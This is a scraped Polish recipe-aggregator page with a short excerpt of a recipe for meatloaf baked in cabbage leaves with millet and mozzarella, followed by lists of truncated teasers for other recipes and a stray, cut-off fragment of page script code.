Pieczeń rzymska pieczona w liściach kapusty z kaszą jaglaną i serem mozzarella
Źródło: https://lesnyzakatekdany.blogspot.com/2021/01/pieczen-rzymska-pieczona-w-lisciach.html
Nie smarujemy foremki, nie używamy bułki i plastrów z boczku, aby ją obłożyć przed pieczeniem. To wszystko nam zastąpią liście kapusty, których po upieczeniu jeść nie musimy. Jednak zdejmując te bardziej przypieczone można jeść, bo są bardzo smakowite. Liście przed wyłożeniem foremki myjemy, osuszamy i smarujemy tłuszczem.Polecam wypróbować ten sposób, bo pieczeń jest...
Najnowsze przepisy
(function(){ zz99=document.createElement("script");zz99_=("o ⇖ 12
Proste połączenie ale zdecydowanie zawsze się sprawdza.... ⇖ 16
Miodownik bez jajek – mięciutki, puszysty i pięknie... ⇖ 15
Pyszny przepis na noodle z mięsem mielonym. Szybki,... ⇖ 18
Wyobraź sobie ten moment: wyjmujesz z piekarnika idealną... ⇖ 10
Przepisy z bloga
Chleb jest stałym elementem w naszej codzienności. To... ⇖ 39
Jesień może być piękna nawet w kuchni. Stary przepis... ⇖ 88
W ubiegłym roku z owoców głogu robiłam dżemi nalewkę.... ⇖ 92
Pięknie wygląda drzewo lipy w okresie kwitnienia, można... ⇖ 141
Tak przygotowany syrop pozwoli nam uaktywnić substancje... ⇖ 208
Wiosna jest to czas na urozmaicenie domowego pieczywa.... ⇖ 163
Wyjątkowy chleb, prosty w przygotowaniu,. Prawie 100%... ⇖ 181
Przepisy na czasie
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 347
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 259
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 203
Tulipany do barszczyku to znakomita propozycja podania... ⇖ 165
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 164
Pyszny miodownik z kakaową masą grysikową i z orzechami... ⇖ 146
Idealne danie na ciepło na imprezy, lub na obiad. Przepis... ⇖ 67
Domowe pralinki są smaczne, łatwe do zrobienia i... ⇖ 63









































